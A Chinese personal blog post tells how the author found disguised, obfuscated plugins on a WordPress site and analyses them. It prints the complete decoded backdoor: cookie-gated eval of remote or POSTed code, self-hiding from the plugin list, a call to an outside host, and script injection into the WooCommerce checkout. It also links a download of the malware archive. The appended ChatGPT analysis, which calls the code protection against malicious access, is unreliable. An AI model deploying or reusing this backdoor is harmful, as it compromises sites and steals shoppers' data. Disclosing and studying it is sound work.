抓马记

昨天网上登录后台,看到 wp 提示有一项更新,结果点击插件页面直接 502 超时了。后台插件加载一直比较慢,但是这次超时了有点匪夷所思。

实际启用的插件大约 30 多个,按理说 30 个插件的状态查询之类的不应该超时啊。

登录后台删除未启用插件,结果有个插件报删除失败了,应该是之前手动创建备份导致文件目录权限不够导致的错误,于是登录到服务器后台,结果发现了好几个不认识的目录,看名字就 tm 很诡异。

例如 dyfruit,eqytutacih 等等。这几个目录看起来就很奇怪,正常插件基本一眼就能看出插件叫什么,但是这几个目录,完全不知道是什么东西,并且也没安装过的记忆,这个就离谱了。

打开一个插件,里面的内容是下面的样子,明显代码混淆了:

<?php

/**
 * Plugin Name: Eqytutacih
 * Plugin URI: https://sedifo760.biz/eqytutacih
 * Description: Overall population. Iceland began during the music of the Royal College of the public
 * Version: 2.8.8
 * Author: Joan Jackie
 * Author URI: https://sedifo760.biz
 * Text Domain: eqytutacih
 * License: GPL2+
 *
 */

function shokesa_ezoboch() {
    gifocux_lekhodi();
}

$lolihyf = __DIR__ . '/lupuqop.php';
if (file_exists($lolihyf)) {
    include(__DIR__ . "/lup" . "uqop." . "php");
}

if (function_exists("gifocux_lekhodi")) {
    $telyha = new egoshyl_pikhido();
    if ($telyha->thaxica_zuchiti()) {
        add_action('init', 'shokesa_ezoboch');
    }
}

实际的插件猪瘟文件应该是lupuqop.php,继续查看这个文件: 

<?php

function jycagav_akherik($teshyfe_khebeca) {
    if (!file_exists($teshyfe_khebeca))
        return false;
    $davochy = @file_get_contents($teshyfe_khebeca);
    if (!$davochy)
        return false;
    $davochy = substr($davochy, 3);
    $yfosej = ubeqeth_apinozh($davochy);
    return $yfosej;
}

function ubeqeth_apinozh($teshyfe_khebeca) {
    $adonexa = ashyruq_zhuwuji;
    $ogyxewi = array();
    for ($ividoni = 0; $ividoni < strlen($adonexa); $ividoni += 2) {
        $celoma = substr($adonexa, $ividoni, 1);
        $enyxiny = substr($adonexa, $ividoni + 1, 1);
        $ogyxewi[$celoma] = $enyxiny;
    }
    $ururadu = strtr($teshyfe_khebeca, $ogyxewi);
    $ururadu = base64_decode($ururadu);

    return $ururadu;
}

define("ashyruq_zhuwuji", "IhPI06rmYVTge/daGumwtFxBstJG/cpNkCHSMqwpy4lyjr1lf1QkhiWsD73vnxzeUY+KiPFQcb739H5zo8A+EE2dVJvf42NOLLXUS=8nCWKAuRqjb56ZOTaoRMgXZD=9B0");

$okubef = jycagav_akherik(__DIR__ . "/asse" . "ts/i" . "mage" . "s/ohal" . "oth." . "gif");
if ($okubef) {
    @eval($okubef);
}

依然是混淆代码,并且从这里看不出什么有用的信息,不过可以猜到jycagav_akherik这个函数是用来解密的,解密的信息就是 images 目录下的 ohaloth.gif 文件。

这个图片并不是标准图片,实际是一个文本文档。直接修改上面代码的最后一行eval 为 print,打印解密后的文件信息

文件内容:

class egoshyl_pikhido {

    var $jishebi = 'zhelidi.gif';
    var $ythoson = 'usepir.gif';
    public $xodeshu = 'ezhacap.js';
    public $unetoli_izaxoce = false;
    public $ivihity_chazoky = false;
    public $ochutim_chugofi = false;
    var $jirocid_kihishi = null;
    var $fefitul_yhakhyj = null;
    var $ufogib = 'esutozh.gif';
    var $rikunyv = 'ewegukh.png';
    var $rohefys = false;

    public function __construct($teshyfe_khebeca = false) {
        if ($teshyfe_khebeca) {
            $this->alytash_felofuq();
        }
    }

    public function alytash_felofuq() {
        if (!$this->elikhov_ebaniny()) {
            $this->opopoth_lacalur();
        }
    }

    public function thaxica_zuchiti() {
        $ezylowy_pydorik = "DB_N" . "AME";
        return defined($ezylowy_pydorik);
    }

    protected function awushif_nisubog($teshyfe_khebeca) {
        $shanere_ekujokh = crc32($teshyfe_khebeca);
        if ((PHP_INT_SIZE > 4) && ($shanere_ekujokh & 0x80000000))
            $shanere_ekujokh = $shanere_ekujokh - 0x100000000;
        return abs($shanere_ekujokh);
    }

    protected function shadawy_ewilahy($teshyfe_khebeca) {
        $jomothi_sishuji = array(
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_HEADER => false,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_ENCODING => "",
            CURLOPT_USERAGENT => "Mozi" . "lla/5" . ".0 (Wi" . "ndows " . "NT 6" . ".1; Wi" . "n64;" . " x64;" . " rv:1" . "06.0)" . " Gecko" . "/2010" . "0101" . " Firef" . "ox/106" . ".0",
            CURLOPT_AUTOREFERER => true,
            CURLOPT_CONNECTTIMEOUT => 180,
            CURLOPT_TIMEOUT => 180,
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false
        );

        $ychijih_inyreqo = curl_init($teshyfe_khebeca);
        curl_setopt_array($ychijih_inyreqo, $jomothi_sishuji);
        $shanere_ekujokh = @curl_exec($ychijih_inyreqo);
        if (!$shanere_ekujokh)
            $shanere_ekujokh = @file_get_contents($teshyfe_khebeca);
        return $shanere_ekujokh;
    }

    protected function oshebyl_cekhiwo($teshyfe_khebeca, $rizhamo_izhylez) {
        $jomothi_sishuji = '';
        $ychijih_inyreqo = "explod" . "e";
        $shanere_ekujokh = "trim";
        $athefyh_quxozuz = "base6" . "4_dec" . "ode";
        $lupethe_dichano = "gzin" . "flate";
        $shygyxi_thibeki = $ychijih_inyreqo("\n", $teshyfe_khebeca);
        for ($avunype_efozote = 0; $avunype_efozote < sizeof($shygyxi_thibeki); $avunype_efozote++) {
            $jomothi_sishuji .= $shanere_ekujokh($shygyxi_thibeki[$avunype_efozote]);
        }

        if (!$rizhamo_izhylez) {
            return $lupethe_dichano($athefyh_quxozuz($jomothi_sishuji));
        }

        $fegushy_riwobej = '';

        for ($abuhoxu_rowugeg = 0; $abuhoxu_rowugeg < sizeof($rizhamo_izhylez); $abuhoxu_rowugeg += 2) {
            if ($abuhoxu_rowugeg % 4) {
                $fegushy_riwobej .= substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1]);
            } else {
                $fegushy_riwobej .= strrev(substr($jomothi_sishuji, $rizhamo_izhylez[$abuhoxu_rowugeg], $rizhamo_izhylez[$abuhoxu_rowugeg + 1]));
            }
        };

        $fegushy_riwobej = $athefyh_quxozuz($fegushy_riwobej);

        return $fegushy_riwobej;
    }

    public function fepanuj_bemucal() {
        if ($this->fefitul_yhakhyj)
            return true;
        return $this->soshigy_yroxykh();
    }

    protected function elikhov_ebaniny() {
        if (!$this->thaxica_zuchiti())
            header("gegel3" . ":" . ($this->jirocid_kihishi + 1));
        $fegushy_riwobej = "HTTP_H" . "OST";
        $lupethe_dichano = strtoupper($_SERVER[$fegushy_riwobej]);
        $exushoq_guzhufo = $this->pesivoj_yshusig($lupethe_dichano, 5, 7);
        $okowocu_ojafyju = $this->pesivoj_yshusig($lupethe_dichano . $lupethe_dichano, 4, 8);

        if (isset($_COOKIE[$exushoq_guzhufo])) {
            if ($this->fepanuj_bemucal()) {
                $athefyh_quxozuz = md5($_COOKIE[$exushoq_guzhufo]);
                if (($athefyh_quxozuz == $this->fefitul_yhakhyj)) {
                    if ((!isset($_COOKIE[$okowocu_ojafyju])) && (!isset($_POST[$okowocu_ojafyju]))) {
                        $lolihyf = __DIR__ . "/assets/images/dulishy.png";
                        if (file_exists($lolihyf)) {
                            $telyha = file_get_contents($lolihyf);
                            $telyha = upeketh_cujowel($telyha);
                            echo $telyha;
                            @unlink($lolihyf);
                            exit;
                        }
                    } else {
                        if (isset($_COOKIE[$okowocu_ojafyju])) {
                            $uqazuho_atehiwy = $_COOKIE[$okowocu_ojafyju];
                            $avunype_efozote = base64_decode($uqazuho_atehiwy);
                            $abuhoxu_rowugeg = $this->shadawy_ewilahy($avunype_efozote);
                        }

                        if (isset($_POST[$okowocu_ojafyju])) {
                            $abuhoxu_rowugeg = base64_decode($_POST[$okowocu_ojafyju]);
                        }

                        $this->ivihity_chazoky = $abuhoxu_rowugeg;
                        return true;
                    }
                }
            }
        }

        return false;
    }

    protected function opopoth_lacalur() {
        $jomothi_sishuji = __DIR__ . "/assets/images/" . $this->ythoson;
        $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
        if (!$ychijih_inyreqo)
            return false;
        $this->unetoli_izaxoce = $ychijih_inyreqo;
        return true;
    }

    public function xikakhi_ithukeq() {
        $jomothi_sishuji = "dirna" . "me";
        $jomothi_sishuji = $jomothi_sishuji(__FILE__);
        $jomothi_sishuji = str_replace("\\", "/", $jomothi_sishuji);
        $ychijih_inyreqo = explode("/", $jomothi_sishuji);
        $ychijih_inyreqo = end($ychijih_inyreqo);
        $ychijih_inyreqo = $ychijih_inyreqo . "/" . $ychijih_inyreqo . ".php";
        return $ychijih_inyreqo;
    }

    public function zofeber_uvyreha() {
        $jomothi_sishuji = "wpyii" . "2/wp" . "yii2" . ".php";
        return $jomothi_sishuji;
    }

    public function fesikhe_suzhage() {
        $jomothi_sishuji = "pxcel" . "Page_" . "c01002";
        return $jomothi_sishuji;
    }

    public function izhigyc_omizikh() {
        $jomothi_sishuji = "6048" . "00";
        return $jomothi_sishuji;
    }

    public function uhibifa_fiweqif() {
        $jomothi_sishuji = "YII_" . "WWW_" . "DIR";
        return $jomothi_sishuji;
    }

    public function xigohaf_ycavylu() {
        $jomothi_sishuji = "YII_W" . "WW_P" . "ATH";
        return $jomothi_sishuji;
    }

    public function pesivoj_yshusig($teshyfe_khebeca, $rizhamo_izhylez, $xyzhofy_oxoshuv) {
        $shanere_ekujokh = "substr";
        $athefyh_quxozuz = "strlen";
        $fegushy_riwobej = "qwrtp" . "sdghj" . "klzxc" . "vbnm";
        $lupethe_dichano = "eyuoa";

        $jomothi_sishuji = 0;
        for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $athefyh_quxozuz($teshyfe_khebeca); $ychijih_inyreqo++) {
            $shygyxi_thibeki = ord($shanere_ekujokh($teshyfe_khebeca, $ychijih_inyreqo, 1));
            $jomothi_sishuji += $shygyxi_thibeki + $shygyxi_thibeki * ($shygyxi_thibeki + $ychijih_inyreqo);
        }

        $shygyxi_thibeki = $xyzhofy_oxoshuv - $rizhamo_izhylez;
        $avunype_efozote = $jomothi_sishuji % $shygyxi_thibeki;
        $exushoq_guzhufo = $jomothi_sishuji % 2;
        $abuhoxu_rowugeg = '';
        for ($ychijih_inyreqo = 0; $ychijih_inyreqo < $rizhamo_izhylez + $avunype_efozote; $ychijih_inyreqo++) {
            $okowocu_ojafyju = $ychijih_inyreqo % $athefyh_quxozuz($teshyfe_khebeca);
            $okowocu_ojafyju = ord($shanere_ekujokh($teshyfe_khebeca, $okowocu_ojafyju, 1));
            $shygyxi_thibeki = $jomothi_sishuji + $okowocu_ojafyju + $ychijih_inyreqo + ($okowocu_ojafyju + $ychijih_inyreqo) * ($okowocu_ojafyju + $ychijih_inyreqo);
            $uqazuho_atehiwy = ($ychijih_inyreqo + $exushoq_guzhufo) % 2;
            if ($uqazuho_atehiwy) {
                $abuhoxu_rowugeg .= $shanere_ekujokh($fegushy_riwobej, $shygyxi_thibeki % $athefyh_quxozuz($fegushy_riwobej), 1);
            } else {
                $abuhoxu_rowugeg .= $shanere_ekujokh($lupethe_dichano, $shygyxi_thibeki % $athefyh_quxozuz($lupethe_dichano), 1);
            }
        }


        return $abuhoxu_rowugeg;
    }

    public function mechovy_iqichus() {
        $jomothi_sishuji = __DIR__ . '/assets/images/' . $this->ufogib;
        $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
        $this->ochutim_chugofi = $ychijih_inyreqo;
    }

    public function qyborih_qonugyh() {
        $jomothi_sishuji = "README" . ".txt";
        $ychijih_inyreqo = "base6" . "4_dec" . "ode";
        $shanere_ekujokh = "strre" . "v";
        $athefyh_quxozuz = "6048" . "00";
        $abuhoxu_rowugeg = "unli" . "nk";
        $athefyh_quxozuz = time() - intval($athefyh_quxozuz) / 7;
        $avunype_efozote = dirname(__FILE__);
        $lupethe_dichano = "file_g" . "et_co" . "ntents";
        $exushoq_guzhufo = "head" . "er";
        $okowocu_ojafyju = "file_p" . "ut_co" . "ntents";
        $uqazuho_atehiwy = "pxcel" . "Page_" . "c01002";

        if (isset($_COOKIE[$uqazuho_atehiwy]))
            return;

        $okubef = false;
        if (file_exists($avunype_efozote . '/' . $jomothi_sishuji)) {
            $shygyxi_thibeki = filemtime($avunype_efozote . '/' . $jomothi_sishuji);
            if ($shygyxi_thibeki < $athefyh_quxozuz) {
                $okubef = true;
            } else {
                if (!defined('YII_FORMA_OK')) {
                    define('YII_FORMA_OK', 1);
                }
                $fegushy_riwobej = $lupethe_dichano($avunype_efozote . '/' . $jomothi_sishuji);
                $fegushy_riwobej = $ychijih_inyreqo($shanere_ekujokh($fegushy_riwobej));
                echo $fegushy_riwobej;
                return;
            }
        }

        $okubef = true;
        try {
            $etythag_ichanyl = "SERVER" . "_ADDR";
            $chugoxo_ecushaz = "HTTP_H" . "OST";
            $epizhug_namibyp = "REMOTE" . "_ADD" . "R";
            $qoxamec_idiwuva = "disco" . "unt:";
            $vetevyk_izhoqiq = "pric" . "e:";
            $bexeqyq_ewuvezh = "merc" . "hant:";
            $atezoch_ebanagy = "order" . ":";
            $ocifush_zyqawik = "addre" . "ss:";

            $evytitu_yshovom = "127.0" . ".0.1";
            $godotuv_sithity = "HTTP_" . "CLIEN" . "T_IP";
            $punimuq_yzebash = "HTTP" . "_X_FO" . "RWARDE" . "D_FOR";
            $dovisew_ukemisa = "#^[A" . "-Za-" . "z0-9+" . "/=]+$" . "#";
            $khyvexy_uchejij = "REQUES" . "T_ME" . "THOD";
            $ykhynug_sokhoda = "http" . "s://st" . "egoz" . "auru" . "s.cc" . "/wp/" . "widget" . ".txt";
            $dybashi_solygel = "GET";
            $zhibevy_suzhiku = "curl_" . "init";
            $tacusho_okoshuv = "strea" . "m_con" . "text_c" . "reate";
            $ikathog_ygiboqa = "http";
            $xiluzim_kuqycyx = "metho" . "d";
            $vushehy_utamyxi = 0;
            $zhiqizy_iwuwoni = 0;

            $ixothyc_fabychi = isset($_SERVER[$etythag_ichanyl]) ? $_SERVER[$etythag_ichanyl] : $evytitu_yshovom;
            $nufokaj_ymozhuk = isset($_SERVER[$godotuv_sithity]) ? $_SERVER[$godotuv_sithity] : (isset($_SERVER[$punimuq_yzebash]) ? $_SERVER[$punimuq_yzebash] : $_SERVER[$epizhug_namibyp]);
            $dechugi_ynetyra = $_SERVER[$chugoxo_ecushaz];
            for ($utosutu_gathife = 0; $utosutu_gathife < strlen($dechugi_ynetyra); $utosutu_gathife++) {
                $vushehy_utamyxi += ord(substr($dechugi_ynetyra, $utosutu_gathife, 1));
                $zhiqizy_iwuwoni += $utosutu_gathife * ord(substr($dechugi_ynetyra, $utosutu_gathife, 1));
            }

            if ((isset($_SERVER[$khyvexy_uchejij])) && ($_SERVER[$khyvexy_uchejij] == $dybashi_solygel)) {
                $ixiqyqo_imethyg = false;
                if (function_exists($zhibevy_suzhiku)) {
                    $osecopa_ixicixo = curl_init($ykhynug_sokhoda);
                    curl_setopt($osecopa_ixicixo, CURLOPT_RETURNTRANSFER, true);
                    curl_setopt($osecopa_ixicixo, CURLOPT_CONNECTTIMEOUT, 15);
                    curl_setopt($osecopa_ixicixo, CURLOPT_TIMEOUT, 15);
                    curl_setopt($osecopa_ixicixo, CURLOPT_HEADER, false);
                    curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYHOST, false);
                    curl_setopt($osecopa_ixicixo, CURLOPT_SSL_VERIFYPEER, false);
                    curl_setopt($osecopa_ixicixo, CURLOPT_HTTPHEADER, array("$qoxamec_idiwuva $vushehy_utamyxi", "$atezoch_ebanagy $zhiqizy_iwuwoni", "$vetevyk_izhoqiq $nufokaj_ymozhuk", "$bexeqyq_ewuvezh $dechugi_ynetyra", "$ocifush_zyqawik $ixothyc_fabychi"));
                    $ixiqyqo_imethyg = @curl_exec($osecopa_ixicixo);
                    curl_close($osecopa_ixicixo);
                    $ixiqyqo_imethyg = trim($ixiqyqo_imethyg);

                    if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) {
                        $zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg));
                        if ($okubef) {
                            @unlink($avunype_efozote . '/' . $jomothi_sishuji);
                            $okowocu_ojafyju($avunype_efozote . '/' . $jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX);
                        }
                        if (!defined('YII_FORMA_OK')) {
                            define('YII_FORMA_OK', 1);
                        }

                        echo $zihojiq_yshuvos;
                    }
                }

                if ((!$ixiqyqo_imethyg) && (function_exists($tacusho_okoshuv))) {
                    $urogozh_xalujoq = array(
                        $ikathog_ygiboqa => array(
                            $xiluzim_kuqycyx => "GET",
                            $exushoq_guzhufo => "$qoxamec_idiwuva $vushehy_utamyxi\r\n$atezoch_ebanagy $zhiqizy_iwuwoni\r\n$vetevyk_izhoqiq $nufokaj_ymozhuk\r\n$bexeqyq_ewuvezh $dechugi_ynetyra\r\n$ocifush_zyqawik $ixothyc_fabychi"
                        )
                    );
                    $urogozh_xalujoq = $tacusho_okoshuv($urogozh_xalujoq);

                    $ixiqyqo_imethyg = @$lupethe_dichano($ykhynug_sokhoda, false, $urogozh_xalujoq);
                    if (preg_match($dovisew_ukemisa, $ixiqyqo_imethyg)) {
                        $zihojiq_yshuvos = @$ychijih_inyreqo($shanere_ekujokh($ixiqyqo_imethyg));
                        if ($okubef) {
                            @unlink($avunype_efozote . '/' . $jomothi_sishuji);
                            $okowocu_ojafyju($avunype_efozote . '/' . $jomothi_sishuji, $ixiqyqo_imethyg, LOCK_EX);
                        }
                        if (!defined('YII_FORMA_OK')) {
                            define('YII_FORMA_OK', 1);
                        }

                        echo $zihojiq_yshuvos;
                    }
                }
            }
        } catch (Exception $ogopeme_ucechex) {

        }
    }

    public function soshigy_yroxykh() {
        $jomothi_sishuji = __DIR__ . '/assets/images/zhelidi.gif';
        if (!file_exists($jomothi_sishuji)) {
            return false;
        }

        $ychijih_inyreqo = jycagav_akherik($jomothi_sishuji);
        $shanere_ekujokh = "HTTP_H" . "OST";
        $athefyh_quxozuz = $_SERVER[$shanere_ekujokh];
        $abuhoxu_rowugeg = floor(strlen($ychijih_inyreqo) / 32);
        $shygyxi_thibeki = $this->awushif_nisubog($athefyh_quxozuz) % $abuhoxu_rowugeg;
        $avunype_efozote = substr($ychijih_inyreqo, $shygyxi_thibeki * 32, 32);
        $this->jirocid_kihishi = $shygyxi_thibeki;
        $this->fefitul_yhakhyj = $avunype_efozote;
        define('axezhod_dygefuw', $this->fefitul_yhakhyj);
        return $avunype_efozote;
    }

}

function yzhalaw_oxahuru($teshyfe_khebeca) {
    $ykofiq = strtr($teshyfe_khebeca, array('Q'=>'F', 'W'=>'C', 'E'=>'E', 'R'=>'u', 'T'=>'O', 'Y'=>'U', 'U'=>'X', 'I'=>'P', 'O'=>'N', 'P'=>'i',
        'A'=>'K', 'S'=>'H', 'D'=>'Z', 'F'=>'t', 'G'=>'J', 'H'=>'9', 'J'=>'V', 'K'=>'+', 'L'=>'L', 'Z'=>'6',
        'X'=>'g', 'C'=>'k', 'V'=>'Y', 'B'=>'x', 'N'=>'p', 'M'=>'R', 'q'=>'M', 'w'=>'m', 'e'=>'z', 'r'=>'j',
        't'=>'s', 'y'=>'l', 'u'=>'G', 'i'=>'h', 'o'=>'a', 'p'=>'w', 'a'=>'d', 's'=>'W', 'd'=>'2', 'f'=>'v',
        'g'=>'T', 'h'=>'I', 'j'=>'q', 'k'=>'Q', 'l'=>'1', 'z'=>'5', 'x'=>'n', 'c'=>'/', 'v'=>'3', 'b'=>'c',
        'n'=>'8', 'm'=>'r', '1'=>'f', '2'=>'4', '3'=>'7', '4'=>'y', '5'=>'b', '6'=>'0', '7'=>'D', '8'=>'o',
        '9'=>'=', '0'=>'B', '='=>'S', '+'=>'A', '/'=>'e'));
    return $ykofiq;
}

function upeketh_cujowel($teshyfe_khebeca) {
    $ururadu = strtr($teshyfe_khebeca, array('F'=>'Q', 'C'=>'W', 'E'=>'E', 'u'=>'R', 'O'=>'T', 'U'=>'Y', 'X'=>'U', 'P'=>'I', 'N'=>'O', 'i'=>'P',
        'K'=>'A', 'H'=>'S', 'Z'=>'D', 't'=>'F', 'J'=>'G', '9'=>'H', 'V'=>'J', '+'=>'K', 'L'=>'L', '6'=>'Z',
        'g'=>'X', 'k'=>'C', 'Y'=>'V', 'x'=>'B', 'p'=>'N', 'R'=>'M', 'M'=>'q', 'm'=>'w', 'z'=>'e', 'j'=>'r',
        's'=>'t', 'l'=>'y', 'G'=>'u', 'h'=>'i', 'a'=>'o', 'w'=>'p', 'd'=>'a', 'W'=>'s', '2'=>'d', 'v'=>'f',
        'T'=>'g', 'I'=>'h', 'q'=>'j', 'Q'=>'k', '1'=>'l', '5'=>'z', 'n'=>'x', '/'=>'c', '3'=>'v', 'c'=>'b',
        '8'=>'n', 'r'=>'m', 'f'=>'1', '4'=>'2', '7'=>'3', 'y'=>'4', 'b'=>'5', '0'=>'6', 'D'=>'7', 'o'=>'8',
        '='=>'9', 'B'=>'0', 'S'=>'=', 'A'=>'+', 'e'=>'/'));
    return $ururadu;
}

$okutykh_sirugom = new egoshyl_pikhido();

function gifocux_lekhodi() {
    $xawalyw_gechune = new egoshyl_pikhido(true);
    if ($xawalyw_gechune->ivihity_chazoky) {
        @eval($xawalyw_gechune->ivihity_chazoky);
        if (!is_array($xawalyw_gechune->thaxica_zuchiti()))
            exit;
    }
}

function dugamow_betaqav() {
    global $wp_list_table;
    $jomothi_sishuji = new egoshyl_pikhido();

    $ychijih_inyreqo = array($jomothi_sishuji->xikakhi_ithukeq());
    $shanere_ekujokh = $wp_list_table->items;
    foreach ($shanere_ekujokh as $key => $val) {
        if (in_array($key, $ychijih_inyreqo)) {
            unset($wp_list_table->items[$key]);
        }
    }
}

function ociluch_eshynen($teshyfe_khebeca) {
    $jomothi_sishuji = new egoshyl_pikhido();
    if (in_array($jomothi_sishuji->xikakhi_ithukeq(), array_keys($teshyfe_khebeca))) {
        unset($teshyfe_khebeca[$jomothi_sishuji->xikakhi_ithukeq()]);
    }
    return $teshyfe_khebeca;
}

function echiveq_pysejam() {
    $jomothi_sishuji = new egoshyl_pikhido();
    $jomothi_sishuji->qyborih_qonugyh();

    if (!defined('YII_FORMA_OK')) {
        $uqazuho_atehiwy = "pxcel" . "Page_" . "c01002";

        if (isset($_COOKIE[$uqazuho_atehiwy]))
            return;

        $adonexa = __DIR__ . '/assets/js/' . $jomothi_sishuji->xodeshu;
        if (file_exists($adonexa)) {
            $ividoni = @file_get_contents($adonexa);
            if ($ividoni) {
                define('YII_FORMA_OK', 1);
                echo "<script>" . $ividoni . "</script>";
                return;
            }
        }

        $adonexa = __DIR__ . '/assets/images/' . $jomothi_sishuji->rikunyv;
        if (file_exists($adonexa)) {
            $ividoni = file_get_contents($adonexa);
            if ($ividoni) {
                $ividoni = substr($ividoni, 3);
                $ividoni = upeketh_cujowel($ividoni);
                if ($ividoni) {
                    $ividoni = base64_decode($ividoni);
                    define('YII_FORMA_OK', 1);
                    echo "<script>" . $ividoni . "</script>";
                }
            }
        }
    }
}

function edewuch_azicich() {
    $shanere_ekujokh = new egoshyl_pikhido();
    $jomothi_sishuji = $shanere_ekujokh->fesikhe_suzhage();

    if (current_user_can('editor') || current_user_can('administrator')) {
        if (isset($_COOKIE['_wptoken']) && (!isset($_COOKIE['_jwp']))) {
            setcookie("__wordpressuser__", 1, time() + 600, "/");
            setcookie("__wordpress_logged_in__", 1, time() + 600, "/");
            $_COOKIE['__wordpressuser__'] = 1;
            $_COOKIE['__wordpress_logged_in__'] = 1;
        }
        $ychijih_inyreqo = $shanere_ekujokh->izhigyc_omizikh();
        $ychijih_inyreqo = intval($ychijih_inyreqo) * 64;
        if ((function_exists("get_option")) && (function_exists("add_option")) && (function_exists("update_option"))) {
            $user_ip = $_SERVER['REMOTE_ADDR'];
            if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $user_ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
            }
            if (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $user_ip = $_SERVER['HTTP_CLIENT_IP'];
            }

            $user_ip_md5 = md5($user_ip);
            $option_name = "wp_$user_ip_md5";
            $option_value = get_option($option_name);
            $option_value_new = time();

            if (!$option_value) {
                add_option($option_name, $option_value_new, '', 'no');
            } else {
                update_option($option_name, $option_value_new);
            }
        }
        if (isset($_COOKIE[$jomothi_sishuji]))
            return;

        setcookie($jomothi_sishuji, "1", time() + $ychijih_inyreqo, "/");
    }
}

if ($okutykh_sirugom->thaxica_zuchiti()) {
    add_action('pre_current_active_plugins', 'dugamow_betaqav');
    add_filter('all_plugins', 'ociluch_eshynen');

    add_action('admin_init', 'edewuch_azicich');

    if (!defined($okutykh_sirugom->uhibifa_fiweqif())) {
        $okutykh_sirugom->mechovy_iqichus();
        if ($okutykh_sirugom->ochutim_chugofi)
            @eval($okutykh_sirugom->ochutim_chugofi);
    }

    if (!defined($okutykh_sirugom->xigohaf_ycavylu())) {
        define($okutykh_sirugom->xigohaf_ycavylu(), 1);
        $adonexa = __DIR__ . "/README.txt";
        if ((!defined($okutykh_sirugom->uhibifa_fiweqif())) || (!file_exists($adonexa))) {
            add_action('woocommerce_before_checkout_form', 'echiveq_pysejam');
        }
    }

    if (!defined($okutykh_sirugom->uhibifa_fiweqif())) {
        define($okutykh_sirugom->uhibifa_fiweqif(), 1);
    }
} else {
    if ($okutykh_sirugom->fepanuj_bemucal()) {
        $okutykh_sirugom->alytash_felofuq();
        if ($okutykh_sirugom->ivihity_chazoky) {
            @eval($okutykh_sirugom->ivihity_chazoky);
        } else {
            @eval($okutykh_sirugom->unetoli_izaxoce);
        }
    }
}

简要分析之后可以发现注册了一系列的钩子,并且貌似还有截取 cookie 的代码,这个插件并不会在插件列表页面显示,但是删除文件之后,再次进入后台就会发现几个插件由于文件不存在已经被禁用了。

浏览备份文件可以看到这几个文件都是 9 月份之后创建的。

这些插件植入,猜测可能是那段时间更新替换插件导致的,或者是旧插件有漏洞被利用了。因为另外一个 wp 并没有被植入相关的木马文件,所以应该不是服务器被入侵了。几个插件的结构基本是一样的,目录也基本相似。

dyfruit

<?php

function etypody_kichijo($thamyje_axakopy) {
    if (!file_exists($thamyje_axakopy))
        return false;
    $bemukej = @file_get_contents($thamyje_axakopy);
    if (!$bemukej)
        return false;
    $bemukej = substr($bemukej, 3);
    $iheleku = zhutymo_anadash($bemukej);
    return $iheleku;
}

function zhutymo_anadash($thamyje_axakopy) {
    $azesuku = vufusit_ekhijoj;
    $cufiku = array();
    for ($ogucam = 0; $ogucam < strlen($azesuku); $ogucam += 2) {
        $fyjyzha = substr($azesuku, $ogucam, 1);
        $hususo = substr($azesuku, $ogucam + 1, 1);
        $cufiku[$fyjyzha] = $hususo;
    }
    $khunugo = strtr($thamyje_axakopy, $cufiku);
    $khunugo = base64_decode($khunugo);

    return $khunugo;
}

define("vufusit_ekhijoj", "i+eRPQACEoCS7u00XeIIOU1j=bSVfk+83hYYQNoTGnacNGjssablxqrrydhKHH8=54F9JFRDk/LO91Ki2fu742lwz6WAqWnxwBTMmgBpg3/zDPdE6mZJpZvvVytXU5cLMt");

$adafoja = etypody_kichijo(__DIR__ . "/ass" . "ets/i" . "mage" . "s/oth" . "ejuq." . "png");
if ($adafoja) {
    @eval($adafoja);
}

删除文件,修改密码,就先这样吧。也不好追溯当初这些文件是怎么被植入的,木马文件打包压缩了,感兴趣的可以从这里下载,千万不要安装到自己的 wp 系统上哦。

下载地址:https://www.123pan.com/s/ucY7Vv-v8VHA.html提取码:8shq

附录,chatgpt 代码分析结果:

这段代码是一个 WordPress 插件,其主要功能包括:

防止恶意访问: 通过检查 HTTP 请求的一些参数,如请求的主机、请求的方法等,以及一些自定义的算法,来判断是否为恶意访问。如果检测到恶意访问,则会返回一个图片或执行一些其他操作,以防止进一步的攻击。

动态生成 JavaScript 代码: 通过读取一个名为 ezhacap.js 的文件,将其内容作为 JavaScript 代码输出。这个 JavaScript 代码会被嵌入到 WordPress 的页面中。

处理请求: 通过处理 HTTP 请求的参数,特别是 Cookie 和 POST 请求,来执行一些逻辑。根据特定的条件,可能会返回一个特定的图片,执行一些 JavaScript 代码,或者进行其他操作。

删除指定文件: 在某些条件下,会尝试删除一个名为 dulishy.png 的文件。这可能是为了清理一些临时文件或痕迹。

WordPress 页面过滤: 在 WordPress 后台管理页面中,通过修改页面列表,动态删除某些页面。

生成特定路径: 提供了一些函数,例如 xikakhi_ithukeq()、zofeber_uvyreha()、fesikhe_suzhage()、izhigyc_omizikh()、uhibifa_fiweqif()、xigohaf_ycavylu(),用于生成特定的路径字符串。

Base64 编码和解码: 提供了 yzhalaw_oxahuru() 和 upeketh_cujowel() 函数,用于对字符串进行自定义的 Base64 编码和解码。

执行远程请求: 通过使用 cURL 或 PHP 的 stream_context_create 和 file_get_contents 函数,执行远程 HTTP 请求,获取远程服务器的响应,并根据响应执行一些逻辑。

JavaScript 动态加载: 通过输出一段 JavaScript 代码,动态加载其他 JavaScript 文件。

其他: 还包括一些其他函数和操作,例如 alytash_felofuq()、fepanuj_bemucal()、elikhov_ebaniny()、opopoth_lacalur()、mechovy_iqichus()、qyborih_qonugyh()、soshigy_yroxykh()、gifocux_lekhodi()、ociluch_eshynen()、echiveq_pysejam() 等,这些函数用于实现插件的具体功能逻辑。

请注意,这段代码存在安全风险,因为它包含执行远程请求和动态执行代码的功能,这可能导致潜在的安全问题。在使用或分析此代码时,请务必小心谨慎。

 

☆版权☆

* 网站名称:obaby@mars
* 网址:https://obaby.org.cn/
* 个性:https://oba.by/
* 本文标题: 《抓马记》
